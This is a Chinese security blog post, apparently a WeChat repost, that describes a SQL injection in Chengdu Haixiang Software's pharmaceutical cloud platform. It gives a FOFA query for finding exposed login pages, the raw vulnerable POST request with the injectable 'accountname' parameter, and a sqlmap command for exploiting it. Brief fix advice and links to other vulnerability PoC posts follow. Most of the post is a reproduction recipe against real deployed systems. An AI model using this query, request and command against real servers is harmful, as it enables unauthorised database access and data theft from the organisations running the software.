成都海翔软件有限公司海翔药业云平台存在sql注入

admin

103360
文章

87
评论

2024年2月23日20:47:13评论21 views字数 860阅读2分52秒阅读模式

0x00免责声明

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

0x01漏洞描述

成都海翔软件有限公司海翔药业云平台存在sql注入，攻击者可利用此漏洞查询数据、获取系统信息，造成数据及其它安全风险。

0x02漏洞复现

1、fofa

title=="登录海翔"

2、部分界面如下

成都海翔软件有限公司海翔药业云平台存在sql注入

3、搜索账套，随便输入值，BP抓包如下

成都海翔软件有限公司海翔药业云平台存在sql注入

POST /getylist_login.do HTTP/1.1Host: 127.0.0.1Content-Length: 14Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://127.0.0.1Referer: http://127.0.0.1/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=FAE14B13415BA359B95FE239A9272270; __session:0.4635490933257511:=http:Connection: closeaccountname=1

成都海翔软件有限公司海翔药业云平台存在sql注入

4、输入单引号报错

成都海翔软件有限公司海翔药业云平台存在sql注入

5、sqlmap验证，隐患参数accountname

python3 sqlmap.py -r 2.txt -p accountname --dbms=mysql --level 3 --thread 5

成都海翔软件有限公司海翔药业云平台存在sql注入

0x03修复建议

1、升级到安全版本2、采用sql语句预编译和绑定变量。

0x04

原文始发于微信公众号（非攻安全实验室）：成都海翔软件有限公司海翔药业云平台存在sql注入

左青龙
微信扫一扫

右白虎
微信扫一扫

成都海翔软件有限公司海翔药业云平台存在sql注入

用友U8-CRM客户关系管理系统downloadfile.php 任意文件读取漏洞

【0day】瑞友天翼应用虚拟化系统

QVD-2024-15263：禅道身份认证绕过漏洞

红海云ehr-RedseaPlatform-文件上传-PtFjk

魔方网表存在文件上传漏洞【附poc】

脸爱云一脸通智慧平台SystemMng信息泄露漏洞【附poc】

瑞友天翼应用虚拟化系统SQL注入致远程代码执行漏洞

脸爱云-UpLoadPic-任意文件上传漏洞复现

MetaCRM客户关系管理系统存在任意文件上传漏洞-PoC

douphp代码执行漏洞

发表评论

在线咨询

微信